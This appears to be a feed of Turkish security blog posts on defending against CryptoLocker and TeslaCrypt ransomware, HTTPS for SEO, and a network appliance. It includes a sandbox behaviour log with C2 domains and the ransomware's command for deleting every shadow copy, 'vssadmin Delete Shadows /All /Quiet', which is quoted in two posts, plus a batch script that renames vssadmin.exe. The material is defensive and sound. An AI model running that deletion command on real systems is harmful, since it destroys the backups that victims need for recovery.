Güvenlik Üreticilerinin bu teknoloji üzerine ciddi yatırım yaptıklarını görüyoruz. Cryptolocker için tasarlanmış sahte faturalar sandbox ile tespit edilebiliyor. Buradaki önemli teknik detay şudur: Kurumların Sandbox’ı sadece Email üzerinden değil aynı zamanda web sandbox’ı da barındırıyor olmalıdır. Neden ? çünkü kullanıcıya giden sahte TTNET Fatura email’i üzerindeki “Faturamı Görüntüle” linkine tıklayan kullanıcı sahte faturayı email kanalından değil web kanalından indirir. İndirme işlemi için Captha’daki numarayı girip fatura indirme işlemini başlatması gerekmektedir. Eğer şirketlerin sadece Email Sandbox mekanizması varsa. Sandbox Mail Kullanıcıya ulaşmadan önce Email içindeki linklere Tıklayarak dosyaları indirip kendi simülasyon sistemi içinde teste tabi tutmak isteyecektir. Fakat Link tıklandıktan sonra dosyanın indirilmesi için gereken Captcha Kodunu Sandbox giremediğinden dolayı zararlı dosya sisteme indirilmez ve risk analizi yapılamaz. Aşagida Captcha içeren ekran görüntüsünü görebilirsiniz.

 

 

 

clip_image006

 

Yaptığımız birçok Cryptolocker Analizi Oldu. Şubat Ayındaki Saldırının Detaylarını aşağıda bulabilirsiniz. Kırmızı olan yerlere dikkat etmenizi Rica ediyorum. Bundan önceki saldırılarda şifrelenen dosyaları shadow copy’dan dönebilirken. İlgili saldırıda şifrelemeden önce shadow Copy folder’ını silmesi sağlanmıştır. Zararlının her güncel saldırıda kendini geliştirdiğine dair en iyi örnek gösterilebilir.

 

 

Iiit Payload _ afr. Threat Map  

:. 2015-06-25  turkcell_fatura_192189779.exe 

SHA1 7bcb688184ab376c558a5b12317ca6f4e56eb1a8 SHA256 _ 264f47a5f1079887c9fa5438b167e6fa4178df89b57cae3f62aa138232682e71 MD5 c34f039d205d3c5353fe0fe285e18864

SSDeep Hash 12288:Y1rpMPo96B1n0U5hKDOA0mdWIth8z1LUsN:Y1rg0hKDgmmthe1L3N

File Size Type Exif Info  0

544256 Bytes

WIN32 EXE

Trend ATSE [9.826-1078]  Detection Info  r Trend VSAPI [None] TROJ_CRYPTLOCK.SL Sandcastle IVR Log 0 fResides in memory

Behavior

Details

Injects memory with dropped files  C:\WINDOWS\explorer.exe;

Accesses data file

Copies self

Adds file

Source: %WorkingDir%\1 _turkcell_fatura_192189779.exe; Target: C:\WINDOWS\ycovijyd.exe  File: %ALLUSERSPROFILE%\APPLICATION DATX{Random folder name}\01000000

I

File: CAWINDOWS\ycovijyd.exe; Type: VSDT_EXE_W32; CRC: 9ab92179; MD5: c34f039d205d3c5353fe0fe285e18864; SHA1: 7BCB688184AB376C558A5B12317CA6F4E56EB1A8

File: %ALLUSERSPROFILE%\APPLICATION DATX{Randomfolder_name}\02000000

File: %ALLUSERSPROFILE%\APPLICATION DATX{Randomfolder_name}\00000000 

File: %ALLUSERSPROFILE%\APPLICATION DATX{Randomfolder_name}\03000000 File: %ALLUSERSPROFILE%\APPLICATION DATX{Randomfoldername}\04000000 File: %ALLUSERSPROFILE%\APPLICATION DATX{Random folder name}\05000000

Overwrites target files with the encrypted data and adds *.encrypted as the file extension.

It also adds the file "DECPYPT_INSTRUCTIONS.TXT" and "DECPYPT_INSTRUCTIONS.HTML" to every fold it encrypts 

Queries DNS server

klixoprend.com

klixoprend.com; ServiceType: 3; Port: 443 Requests URL4 klixoprend.com/topic.php; ServiceType: 3; Port: 443 Drops executable Pid: 2324; File: C:\WINDOWS\ycovijyd.exe; Type: VSDT_EXE_W32

Adds autorun in registry DATA: ["C:\WINDOWS\{8_random_characters}.exe"]; TYPE: [REG_SZ] CAWINDOWS\explorer.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{8_random_characters}];

Creates process

C:\WINDOWS\system32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet  It deletes the shadow copies of the encrypted files by running this command C:\WINDOWS\system32\NOTEPAD.EXE C:\Documents and Settings\Administrator\Desktop\DECPYPT_INSTRUCTIONS.txt

Executes dropped file 0 Adds registry 0 Creates multiple copies of a file klixoprend.com 0 Network Behavior Information imkosan.net  bareportex.org

 

İndirilen Sahte Fatura Çalıştırıldığında Dosyaları şifreleme başlıyor. Yaşadığım birçok vaka’da Dosyaları şifrelenen istemci üzerinde Map Edilmiş paylaşımlı bir disk varsa buradaki dosyalarda şifrelediğinden. Özellikle dosya sunucusu, Raporlama sunucusu vb yerlerdeki bütün verilerinde Encrypt edildiğini gördüm. Bu sebeple Hangi Güvenlik Yatırımı yapılırsa yapılsın kurumların katı bir yedekleme politikasının olması gerekmektedir.

 

En güncel Fidyecilik Saldırılarından Cryptowall, Cryptolocker’ın kuzeni oalrak isimlendirilir. Yani bir varyantıdır. Cryptowall 4.0 da yapılan incelemlerde enteresan iki geliştirme görülmüştür.

 

Eğer Klavye’niz Rusça ise Zararlı Dosya Şifreleme yapmamaktadır.

Bir diğeri de Cryptowall 4.0 RSA 2048 Bir Şifreleme Algoritması Kullanmıştır.

 

Cryptolocker ve Cryptowall’a karşı bazı antivirus üreticileri ve bağımsız güvenlik araştırma yapan arkadaşlarımız çeşitli bir takım koruma modülleri geliştirdiler. İlk akla gelen şey şuydu. Cryptolocker dosyaların uzantısını  .encrypted yapıyor fikrinden ilerleyerek. Dosyaların uzantısını değiştiren buna sebep olan şeyi bulmaya yönelik bir fikir ortaya atıldı. Pyton ve Java’da bazı tool’lar geliştirildi. Hacker’lar Yapılan bu geliştirmelere atak olarak bir sonraki varyant’ta dosya uzantısını ccc. Olarak değiştirdi. Tabi sonraki varyantlarda da uzantı değişerek devam etti. Bu durum extension bazlı bir kontrol yapılamayacağını herkese göstermiş oldu.

 

Bunun yerine Bütünlük kontrolü daha sağlıklıydı. Ne de Olsa şifrelenen dosyaların Bütünlüğü değişiyordu ve eski bütünlük değeri ile yeni bütünlük değeri birbirinden farklı ise buna neyin sebep olabileceği bilinebilirdi. Buradan yola çıkarak bir takım zaman algoritmalarıyla beraber ciddi korumalar sağlandı. Tabi bu koruma dosyaya karşı değil dosyaların şifrelenmesine karşıydı.

 

Güvenliği bir savaş olduğunu unutmamız gerekiyor. Bu adımda birileri hep bir adım önde ve yapılan aksiyonlara üretilen reaksiyonların dışında yapılacak hiç bir şey yok değil. Kullanıcılar olarak bizler daha dikkatli, olaylara yaklaşımımız daha şüpheci olursa, insan psikolojisi üzerine yapılan birçok saldırıyı minimize edebiliriz.

 

Dosyaların Bütünlüğünün belli zaman aralıklarında gösteren basit bir grafiği aşağıdaki gibi paylaşıyorum.

 

clip_image008

 

 

Klasik Sloganımla Yazıyı Bitirmek isterim.

 

Şüphe, Doğru ve Yeterli İnsan Kaynağı, doğru teknolojik Yatırım ile Güvenlik Riskini sıfıra indiremeyiz ama riski minimize edebiliriz.

 


HTTPS ve SEO

$
0
0

Google son zamanlarda güvenlik unsurunu en ön planda tutmakta ve yıl içinde anons ettiği gibi artık Google aramalarında HTTPS kullanımı, SEO tarafında siteyi daha ön plana çıkaran bir nitelik olarak tanımlanmış durumda. Google Webmaster Tools tarafında da bu kıstas tanımlanmış olup sahibi olduğunuz veya çalıştığınız kurumun web sitesinin SSL sertifikası kullanması size avantaj sağlıyor olacak. Şu an için fazla etkisi olmasa da zaman içerisinde SSL kullanan sitelerin SEO tarafında daha fazla puan kazanacağı Google tarafından ayrıca açıklanmıştı.

 

Google özellikle internet kullanımının daha güvenli hale gelmesi ve paylaşılan önemli bilgilerin korunması amacıyla SSL kullanımını en üst düzeyde tutmaya kararlı bir şekilde sektöre yön veriyor. Bu konuda da uluslararası standartların olabilecek en üst düzeyde kullanılması için devamlı iyileştirmeler yaparak bunları özellikle Chrome kullanıcılarına dolayısıyla sitelere zorunlu hale getiriyor. Bu durumu, üretilen SSL sertifikalarında SHA2 algoritmasının kullanılması yaptırımı ile (SHA1 den SHA2’ye geçiş zorunluluğu) yıl içerisinde görmüş olduk.

 

SEO açısından sadece SSL kurulması değil bu sertifikanın doğru bir şekilde tüm siteyi içerecek şekilde kullanılması gerekliliği de ön plana çıkan diğer bir kıstas. Tabi bilindiği gibi burada HTTPS ile beraber birçok kıstas söz konusu olup SEO profesyonelleri tarafından bu iyileştirme daha iyi dile getirilip yorumlanabilir.

 

Ulaşılmaya çalışılan asıl amaç, zaman içerisinde kullanıcıların bilinçli bir şekilde gerçekten doğru siteye bağlandıklarını SSL kullanımının tespitiyle yapabilmelerini sağlamak. Böylece hem SSL kullanan site bilgi güvenliğini sağlamış olacak hem de kullanıcı doğru sitede bulunduğunun bilinciyle güvenli bir şekilde bilgi alışverişinde bulunabilecek.

 

clip_image002

 

SEO için HTTPS kullanımı

 

Web üzerinde güvenli bilgi paylaşımıyla beraber, SEO amaçlı SSL kullanımı için sitenizi HTTP’den HTTPS’e çevirirken aşağıdaki kıstaslar bazında ilerlemeniz özellikle Google tarafından tavsiye edilmektedir;

  • İlk önce hangi tür sertifikanın sizin için daha uygun olacağına karar vereceksiniz; DV, OV veya EV SSL. Ayrıca aynı sunucuda barındırdığınız birden fazla sunucu adları için SAN veya Wildcard sertifika türlerini de tercih edebilirsiniz,
  • 2048-bit anahtar uzunluğunu tercih edin,
  • RSA256 şifreleme kullanan sertifikaları tercih edin,
  • Sitenizde barındırdığınız içeriklerle alakalı linklere yer verin,
  • Diğer alan adlarınız içinde kullandığınız protokolleri kullanın,
  • HTTPS moduna aldığınız sitenizde robots.txt kullanımını engellemeyin,
  • Tarayıcıların sitenizi indexlemesine izin verin ve mümkün olduğunca “noindex” komutunu kullanmayın,
  • Yapmış olduğunuz değişikliklerin SEO’ya etkisinin takibini mutlaka yapın.

 

                                clip_image004

Sertifika Seçimi

 

SSL sertifika çeşitleri DV, OV ve EV olmak üzere 3 gruba ayrılır.

 

§  DV SSL: kurumsal doğrulama yapılmadan sadece alan adının doğrulaması yapılarak kısa süre içinde alınabilecek sertifika türüdür. Doğrulama; haiz olunan alan adı üzerine bir dosya koyulmasının teyidi veya aynı alan adına ait jenerik bir e-mail hesabı (admin@, administrator@, webmaster@, hostmaster@ veya postmaster@) aracılığıyla iletişim kurma yoluyla yapılır. Bu sertifika türünde başvuru yapan kurum doğrulanmadığından sertifikada kurum adı yazmaz ve mutlaka DV SSL ibaresi yer alır.

 

§  OV SSL: kurumsal doğrulama adımlarının her biri onaylanarak bu sertifika verilir. Kurum adı, kurumun faaliyette olup olmadığı, başvuruyu yapan kişinin kurumda çalışıp çalışmadığı, başvurunun kurum tarafından gelip gelmediği, başvuru yapılan alan adının sahipliğinin veya kontrolünün bu kurumda olup olmadığı ve tüm iletişim bilgilerinin doğruluğu tek tek doğrulanır. Kurumsal doğrulama yapılığı için, kullanıcılar tarafından bakılacak olursa, DV sertifikalarından daha güvenilir bir sertifika türüdür.

 

§  EV SSL: güvenlik düzeyi en yüksek olan ve sertifika sahibi firmanın fiziksel, hukuki ve ticari varlığıyla beraber kapsamlı kurumsal doğrulama süreçleri sonrası verilen sertifikalardır. Kullanıcılar tarayıcı üzerinde EV SSL sertifikası bulunan bir siteye bağlandığı takdirde adres çubuğunda güvenilir site niteliği taşıyan yeşil renkli bir gösterim belirecektir. Bu da kullanıcılar için yüksek güvenlikli bir siteye bağlandıklarının onayıdır. Bu sertifikalar genellikle bankalar, büyük e-ticaret siteleri ve büyük kurumlar tarafından tercih edilmektedir.

 

                                                    clip_image006

 

Bu üç sertifika türü haricinde aynı sunucu üzerinde birden fazla domain veya alt domainler bulundurulması halinde SAN veya Wildcard opsiyonlu sertifikalar temin edilebilir.

 

§  SAN opsiyonu: birden fazla sunucunun aynı sertifika içine yazılması ihtiyacınız dahilinde bu sertifika opsiyonu tercih edilebilir. Buradaki en önemli kıstas yazılacak tüm sunucu adlarının aynı kuruma ait olması gerekliliğidir. Ayrıca farklı domainlerdeki sunucu adları da bu sertifika opsiyonuyla aynı sertifika içine yazılabilir.

 

§  Wildcard opsiyonu: Wildcard SSL ile tek bir alan adı için o alan adının tüm alt alan adlarını kapsayan bir sertifika alınabilir. Bu tür sertifikalarda alan adının başında “*” karakteri konularak, bu alan adının altındaki tüm alt alan adları kapsanmış olur (örneğin “*.domain.com”).

 

Google yapmış olduğu açıklamalarda, HTTPS bağlantısının önemini vurgularken, SSL kullanımıyla hem bilgi güvenliğinin sağlandığını hem de sitenin sahibi olduğu kurumun kimliğinin doğrulandığını belirtmektedir. Bununla beraber alınacak SSL sertifikaların mutlaka SHA-256 algoritması kullanılarak üretildiğinden emin olunması gerektiğini de belirtmektedir. Keza artık SHA1 algoritmasıyla üretilen sertifikalar birçok tarayıcıda geçersiz olarak kabul edilmektedir.

 

 

                                 clip_image008

Sitenizin ve Sunucunun Optimize edilmesi

 

·        Sertifikayı yüklemeden önce sunucunuzda kullanılan yazılımların en güncel halinin kullanıldığına dikkat edin,

·        Kullandığınız sistemin güncel güvenlik ve şifreleme protokolleriyle ve uyumlu bir yazılım ve/veya sistem olmasına dikkat edin,

·        SSL sertifikasını yükledikten sonra sunucunuz hem HTTP hem de HTTPS bağlantıları için ulaşıma açık olacaktır. SEO açısından doğru olanı yapmak adına HTTP bağlantınızı HTTPS bağlantısı üzerine yönlendirmeniz gerekecektir. Bu bağlamda tüm yapılandırmalarınızı gözden geçirmeniz gerekir. Wordpress gibi servisleri kullanıyorsanız yine bu servisler içinde HTTPS bağlantısına geçtiğinizi kurgulamak durumundasınız. Konu hakkında daha fazla bilgi için aşağıdaki linki ziyaret edebilirsiniz;

https://mozilla.github.io/server-side-tls/ssl-config-generator/

·        HSTS (HTTP Strict Transport Security) sitenizdeki SSL bağlantısını hızlandıracak ve tüm iletişimin HTTPS modunda kalmasını sağlayacak bir uygulama olup özellikle tavsiye edilmektedir.

·        301 yönlendirmelerinizi sitenizin HTTPS versiyonuna yapmalısınız,

·        SPDY protokolü Google tarafından TLS bağlantılarını hızlandırmak üzere tasarlanmış olan ve birden fazla istemi tek bağlantıya yönlendiren bir modüldür. Bu protokol her sunucuyla uyumlu olmayıp, daha fazla bilgi için aşağıdaki linkten faydalanabilirsiniz;

http://spdycheck.org/

·        OCSP (Online Certificate Status Protocol) sertifikanın iptal edilip edilmediğinin kontrolünü sağlar. Bu yüzden OCSP Stapling kullanan sunucular tarayıcıların ekstradan bu kontrolü yapmasına gerek kalmadan bu kontrol hizmetini kolaylaştırarak sağlamış olurlar.

·        Session Tickets kullanımı ile de sunucu ve tarayıcı arasındaki bağlantının hızlı akması sağlanabilir. Eğer kullanıcı tarayıcısıyla halihazırda bu siteyi ziyaret etmiş ise ‘session ticket’ sayesinde tekrar ziyaret sırasında yeniden ‘handshake’ yapılmasına gerek kalmadan bağlantının güvenli olduğu farz edilerek bağlantıya kalınan yerden devam edilir. Bu metodun kullanımının itinayla yapılması gerektiği özellikle belirtilmektedir.

 

Sitenin ve Sunucunun Test edilmesi

 

Sunucunuzun protokoller bazında optimize edilmesi sitenizin daha güvenli olmasını sağlayacaktır. Sitenizdeki sertifikanın doğru çalışıp çalışmadığını ve sunucunuzdaki tüm protokollerin kontrolünü aşağıdaki siteden gerçekleştirebilir ve gerekli güncellemeleri yapabilirsiniz;

https://www.ssllabs.com/ssltest/analyze.html

 

clip_image010

 

Son olarak ‘Google Webmaster Tool’ u kullanarak SSL kullanımı ile yaptığınız değişiklikleri gözetleyip sitenizin kalan eksiklerini de belirleyebilirsiniz.

 

Teslacrypt Şifrelenmiş Dosyaların Çözüm İşlemleri

$
0
0

Dünya üzerinde birçok kullanıcının bilgisayarını etkilenen bilgisayarlardaki şifrelenmiş dosyaların çözümü artık mümkün bununla ilgili yapılması gereken işlemleri aşağıda anlatmaya çalıştım.

Öncelikle çözümleme için birkaç program gerekmektedir. Bunun için aşağıdaki programları indiriniz.

1.      Tesladecoder

2.      Yafu

Daha sonra virüs bulaşmış bir dosyayı çözüme başlamak için hazırlayınız.

Daha sonra Tesladecoder adındaki sıkıştırılmış dosyayı genişleterek açınız.

clip_image002

Resim – 1

Genişletilen dosya içerisinde TeslaViewer.exe ismindeki uygulamayı çalıştırıp bir sonraki adıma ilerleyiniz.

clip_image004

Resim – 2

Browse.. butonunu kullanarak virüs bulaşmış dosyayı seçiniz ve bir sonraki adıma ilerleyiniz.

clip_image006

Resim – 3

Seçmiş olduğunuz virüslü dosya için yukarıda görünün HEX ve DEC kodları görmeniz gerekiyor eğer bunları göremiyorsanız başka bir dosya için deneyiniz. Daha sonra Create work.txt butonuna basarak çalışma dosyanızı hazırlamasını sağlayıp bir sonraki adıma geçiniz.

Bu adımda artık YAFU kullanmaya başlayacağız. YAFU sıkıştırılmış dosyanızı genişleterek açınız.

clip_image008

Resim – 4

YAFU klasörü içerisinde yer alan “RunYafu.exe” çalıştırıp bir sonraki adıma ilerleyiniz.

clip_image010

Resim – 5

Gelen ekranda “Tune Yafu” butonuna basınız ve bekleyiniz.

clip_image012

Resim – 6

YAFU tune işlemi bittiğinde tekrar ana ekrana geleceğiz. Ana ekrana geldiğinizde “Work.txt” dosyası içerisinde yer alan “SharedSecret1*PrivateKeyBC”  bölümündeki “DEC” ile başlayan bölümü kopyalayınız.

clip_image014

Resim – 7

Work.txt dosyası içerisinden kopyaladığınız SharedSecret*PrivateKeyBC Decimal değerini kutucuğun içerisine yapıştırın. 

Ekranda bulunan Factoring Threads değeri işlemcinizde bulunan sanal işlemci sayısıdır buna göre değeri arttırıp düşürebilirsiniz. Bu değer şifrenin çözümü için harcanacak zamanı değiştirecektir.

Factor SharedSecret*PrivateKeyBC butonuna basıp işlemi başlatın.

clip_image016

Resim - 8

İşlem bitiminde örnek Resim – 8 deki gibi rakamlar görünecektir. Bunları kopyalayınız ve sıralamasını bozmayınız. (P1, P2, v.b. ibareleri kopyalama işleminden sonra bir text dosyanın içerisinde temizleyiniz)

TeslaDecoder klasöründe yer alana “Teslarefactor.exe” çalıştırın.

clip_image018

Resim – 9

Gelen ekranda YAFU da elde ettiğimiz kodları “Put decimal foctors here.” Yazan alana yapıştırınız. Daha sonra “work.txt” dosyamızdaki “PublicKeyBC =” alanındaki hex kodları “Public key (hex):” alanına yapıştırınız.

clip_image020

Resim – 10

YAFU ile elde ettiğimiz kodu ve work.txt içerisindeki public key ilgili alanlara yerleştirip “Find private key” butona basıp işlemi başlatın. İşlem tamamlandıktan sonra “Private key (hex)” alanında bize yeni bir kod değeri verecektir.

Private key (hex) kodunu kopyalayınız ve Tesladecoder klasöründeki Tesladecoder.exe uygulamasını çalıştırın.

Önemli Not: Private key (hex) kodunu bir yere kayıt ediniz. Bundan sonraki tüm dosyalarınızı bu kod ile çözeceksiniz. Buraya kadar anlatılan işlemler sadece bir kez yapılması yeterlidir.

Bu kodu alıp her şifrelenmiş dosya için kullanamazsınız buna da dikkat ediniz. Aynı bilgisayarda şifrelenmiş dosyalar için geçerlidir. Her yeni vaka yeni bir key demektir.

clip_image022

Resim – 11

Gelen ekranımızda “Set key” butonuna tıklayın ve bir sonraki adıma ilerleyiniz.

clip_image024

Resim – 12

“Key (Hex):” alanına Tesla refactor da elde ettiğimiz kodu yapıştırıyoruz. Extension bölümünden hangi uzantılı dosyaları çözeceğimizi belirtiyoruz ve Set key butonuna basıp hazır duruma getiriyoruz.

clip_image026

Resim – 13

Artık çözme işlemine hazır durumdayız tek bir dosya içerisindeki tüm verilerin şifrelerini çözebileceğimiz gibi tüm sistemdeki dosyaları da çözdürebiliriz bu sizin tercihinize kalmış bir durumdur. İşlemi başlatmadan önce şifrelenmiş dosyaların bir kopyasında deneme yapınız ve mutlaka yedek alınız.

İşlemi başlattığınızda şifreleri çözdükten sonra şifre uzantılı dosyaları silip silmeyeceğini sormaktadır tavsiyem “Hayır” seçeneğini seçmenizdir ki olası sorunlarda dosyalarda tekrar işlem yapma şansınız olsun.

clip_image028

Resim – 14

İşlem bitiminde TeslaDecoder ekranında durumla ilgili bilgi vermektedir. Görüldüğü üzere 1 adet dosyayı çözümlemiştir. Artık dosyayı açtığımda çalışır durumda olduğunu görebilmekteyiz.

Son olarak çözüm için farklı yöntemlerde mevcuttur ancak en basit hali ile ele almaya çalıştım. İhtiyaç durumunda python ve teslacrack.py dosyaları ile referanslardan faydalanabilirsiniz.

Bu durumun tekrar başınıza gelmemesini umut ederek hepinize faydalı olmasını dilerim.

Programı yazıp kullanıma sunan emek harcayan Lawrence Abrams ve ÇözümPark Mail Grubunda bizleri hızlıca bilgilendiren Mehmet YAYLA’ ya, python kullanımını kısaca açıklayan Resul YÜKSEL’ e teşekkür ederiz.

Özel Not: TeslaCrypt yeni versiyonu çıktı yeni uzantı xxx ve ttt olarak adlandırılmaktadır. Şuan için çözümü yok eğer bulunursa paylaşıyor olacağız.

Referanslar:

https://github.com/Googulator/TeslaCrack
http://www.bleepingcomputer.com/
http://sourceforge.net/projects/yafu/

 

Fidye Yazılımlarına Karşı Etkili Savunma Yöntemleri - Cryptolocker

$
0
0

Artık hepimizin yakından bildiği fidye yazılımları, her geçen gün çok daha fazla insanı etkilemekte ve daha fazla iş/maddi kayba yol açmaktadır.Dünya üzerinde insanları etkileyen 30'dan fazla Locker bulunmaktadır. Bunlar genel olarak aynı işlemi yapsa da çalışma prensipleri ve yöntemleri farklıdır.Bu yazılımlardan korunmaya yönelik çeşitli araçlar/yazılımlar bulunsa da, kesin bir koruma iddiası şu aşamada çok mümkün görünmüyor. Bahse konu koruma yazılımlarının dışında, bilgisayarlarınızda veya ağınızda aşağıdaki işlemleri uygularsanız ciddi sayılabilecek bir korunma sağlamış olursunuz.

Nedir bu araçlar?1-Belli klasörler veya yollardan belirli dosyaların çalışmasının yerel grup ilkeleri ile engellenmesi2- Önemli bir yedek rutini olan gölge kopyaların ( shadow copy ) korunması ve etkinleştirilmesi

1- Yerel Grup İlkesi (Group Policy ) ile zararlı yazılımların engellenmesi : Yazılım Kısıtlama ilkesinin kullanılması ( Software Restriction Policy ) Software Restriction Policy kullanımıyla ilgili genel makaleye şu adresten ulaşabilirsiniz. Biz bu makalede yalnızca kripto yazılımlarını engellemeye yönelik çalışmalar yapacağız.İlgili makale :http://www.cozumpark.com/blogs/windows_server/archive/2008/04/28/software-restriction-policy.aspxYerel Grup Ilkesini (Group Policy) kullanmak için Pro seviyesinde bir işletim sistemi kullanıyor olmanız gerekir. 64 ya da 32bit seçeneği bu anlamda bir sorun teşkil etmez.Yazılım Kısıtlama İlkesine başlatàgpedit.msc yazarak kolayca erişebilirsiniz.Software Restriction Policy; yukarıda da değindiğimiz gibi çeşitli yazılımların çalışmasını engellemeye yönelik kurallar oluşturmamıza yarayan bir politika şablonudur.

Kripto yazılımları genel olarak; mail ile ya da web'ten indirdiğinizde kendisini %appdata% ya da %temp% altına kopyalayarak buradan çalışmaya başlar. TorrentLocker v3'te bu durum değişmiş ve Windows kök klasöründen çalışmaktadır. Ama diğer kripto yazılımlarının geneli bu ana klasörlerden çalışmaktadır. Öncelikle bu klasörlerden *.exe çalışmasını engellemeye çalışacağız.

New Path Rule : New Path Rule diyerek *.exe çalışmasını istemediğimiz yolları belirliyoruz.

Aşağıdaki ekranda da göreceğiniz üzere; Path : *.exe çalışmasını istemediğimiz klasörün yoluSecurity Level : DisallowedDesciption : Kuralı tanımlayan açıklayıcı bir metin

Aşağıda kripto yazılımını engellemeye yönelik dizinlerin yolları verilmiştir. Yukarıdaki örneğe göre aşağıdaki yolların yasaklanmasını sağlayabilirsiniz.

Kural listesini indirmek için aşağıdaki linki ziyaret edebilirsiniz :http://mehmetyayla.com/download/rule_list.txt

2. Gölge Kopyaların ( Shadow Copy ) Etkinleştirilmesi ve korunması:Shadow Copy; Windows 2003 ile gelen yeni bir veri kurtarma aracıdır. Shadow copy sayesinde zaman içerisinde değişime uğramış ya da silinmiş mevcut dosya ve klasörlerin eski versiyonlarına geri dönüş yapmak mümkündür. Klasörlerin gölge kopyalarının görülebilmesi için bilgisayarınızda shadow copy aktif olmalıdır. Shadow copy XP'de ön tanımlı olarak gelmez, diğer işletim sistemleri için sadece sistem sürücüsü ön tanımlı olarak gelir.

Shadow Copy ( gölge kopya ) özelliğini yine group policy ile açmak için aşağıdaki resmi inceleyiniz. Bu politikayı ağ ortamından dağıtabileceğiniz gibi, yerel politika olarakta uygulayabilirsiniz.İlgili ilkeyi uygulamak için öncelikle aşağıdaki resimde görünen düğümden aktif hale getiriniz.

Daha sonra aşağıdaki düğümü kullanarak özellik tanımı yapınız. Eğer durum (state); not configured (ayarlanmamış ) olarak tanımlanmışsa disable ( etkin değil ) anlamını taşır, yine de aşağıdaki ayarları disable ( etkin değil ) olarak işaretleyebilirsiniz.

3. Vssadmin aracının ismini değiştirmek :    

Vssadmin; gölge kopyaları yönetmeye yarayan aracın adıdır. Kripto yazılımlarının rutinlerinden biri de vssadmin aracını kullanarak tüm gölge kopyaları silmesidir.Kripto yazılımı rutin işlevi : vssadmin.exe Delete Shadows /All /Quievssadmin.exe aracı %WinDir%\system32\vssadmin.exe dizini altından çalışır. Not: Vssadmin.exe ismi değiştirilirse vssadmin yonetim konsolu veya shadow explorer çalışmaz. Bu iki uygulamaya tekrar erişmek için system32 dizininin altından uygulamanın adı tekrar değiştirilmeli.     

Bu aracın ismini değiştirmek kripto yazılımının gölge yedekleri silmesini engelleyecek zira rutini doğru çalışmayacaktır. vssadmin aracının ismini değiştirmeyi aşağıdaki kodları bat dosyalarına çevirerek yapabileceğiniz gibi, yine aşağıda linkini verdiğim dosyayı indirip açarak ve çift tıklayarak uygulayabilirsiniz.Örnek kod:Not : vssadmin aracının sonuna zaman kodunu atıyor.

@echo off

REM We are redirecting the output of the commands and any errors to NUL.

REM If you would like to see the output, then remove the 2>NUL from the end of the commands.

REM Check if vssadmin.exe exists. If not, abort the script

if NOT exist %WinDir%\system32\vssadmin.exe (

echo.

echo.%WinDir%\system32\vssadmin.exe does not exist!

echo.

echo Script Aborting!

echo.

PAUSE

goto:eof

)

REM Check if the script was started with Administrator privileges.

REM Method from http://stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights

net session >nul 2>&1

if %errorLevel% NEQ 0 (

echo.

echo You do not have the required Administrator privileges.

echo.

echo Please run the script again as an Administrator.

echo.

echo Script Aborting!

echo.

PAUSE

goto:eof

)

REM We need to give the Administrators ownership before we can change permissions on the file

takeown /F %WinDir%\system32\vssadmin.exe /A >nul 2>&1

REM Give Administrators the Change permissions for the file

CACLS %WinDir%\system32\vssadmin.exe /E /G "Administrators":C >nul 2>&1

REM Generate the name we are going to use when rename vssadmin.exe

REM This filename will be based off of the date and time.

REM http://blogs.msdn.com/b/myocom/archive/2005/06/03/so-what-the-heck-just-happened-there.aspx

for /f "delims=/ tokens=1-3" %%a in ("%DATE:~4%") do (

for /f "delims=:. tokens=1-4" %%m in ("%TIME: =0%") do (

set RenFile=vssadmin.exe-%%c-%%b-%%a-%%m%%n%%o%%p

)

)

REM Rename vssadmin.exe to the filename in the RenFile variable

ren %WinDir%\system32\vssadmin.exe %RenFile% >nul 2>&1

REM Check if the task was completed successfully

if exist %WinDir%\system32\%RenFile% (

echo.

echo vssadmin.exe has been successfully renamed

echo to %WinDir%\system32\%RenFile%.

pause

) else (

echo.

echo There was a problem renaming vssadmin.exe

echo to %WinDir%\system32\%RenFile%.

echo.

pause

)

:END

İlgili bat dosyasını indirme linki :

http://www.cozumpark.com/files/folders/yuklemeler/entry485580.aspx

Bu tarz tatsız durumlarla hiç karşı karşıya kalmamanız dileğiyle.Not : Yukarıda anlatılan yol ve yöntemler %100 koruma garantisi vermemektedir. İlgili korunma yöntemlerini uyguladıktan sonra dahi, kripto yazılımlarından göreceğiniz zarardan ötürü sorumluluk tamamen size aittir. %100 koruma garantisi ancak sağlıklı ve düzenli yedekle sağlanabilir.Kaynak: community.spiceworks.combleepingcomputer.com

TINA – Threat intercepting Network Appliance – Giriş

$
0
0

clip_image002

Tüm dünyada, yazılım devlerinin tamamının baş belası olan güvenlik açıkları ellerini kollarını bağlamış bulunmaktadır. Bu tip açıklar yetmiyormuş gibi neredeyse her gün yayımlanan açık yamaları ile bile  tehdit yazılımlarına karşı neredeyse çaresiz kalmış durumda. Sonunda tüm bu kargaşa, işin çözümü için ayrı bir sektör oluşmasına sebep olmuş. Güvenlik’te kendi içinde çeşitli branşlara bölünmüş, HSM cihazlardan IPS, IDS ve Firewall ‘lara kadar genişleyen bir yelpaze haline gelmiştir.

Peki, arabalardan buzdolaplarına kadar internetin hayatımıza tekrar çıkamayacak şekilde girmesi hayatı kolaylaştırdığı, daha keyifli hale getirdiği gibi beraberinde getirdiği riskler ile birlikte gitgide daha da büyüyen bir sektör, Bilgi ve Ağ Güvenliği bu işin neresinde?

Aslında temelinde. Çünkü artık çok az tehdit dosya, disk gibi fiziksel araçlarla sistemlerimize ulaşıyor. Atakların neredeyse tamamı ağ üzerinden ve internetten sistemlerimize sızmaya çalışıyorlar. Bu konuda hepimizin ezberinde olan çözümlerin, - Firewall, IDS, IPS, Antivirüs, Antispam v.b.- bazı noktalarda artık yavaş yavaş yetersiz kaldığını eminim siz de benim gibi gözlemliyorsunuz. Anti virüslerin çaresiz kaldığı, başta Ransomware‘ler (Cryptolocker, teslalocker v.s.) olmak üzere yeni türeyen tehditler bilgisayarımızdaki bilgilerden tutun, sunucudaki yedeklerimize, hatta cloud sistemler üzerindeki verilerimize kadar tehdit ediyor. Neredeyse her gün bir yenisi eklenen bankacılık, POS tehditleri ise gizliden gizliye maddi varlığımızı tehdit ediyor. Internet omurgalarına, DNS sunucularına yapılan DDOS saldırıları neredeyse her akşam televizyonlarda.

Peki bu saldırılara maruz kalanların güvenlik çözümleri yok mu? Firewall, IDS, IPS, Antivirus, Antispam kullanmıyorlar mı? Kullansalar bile yetersiz mi?

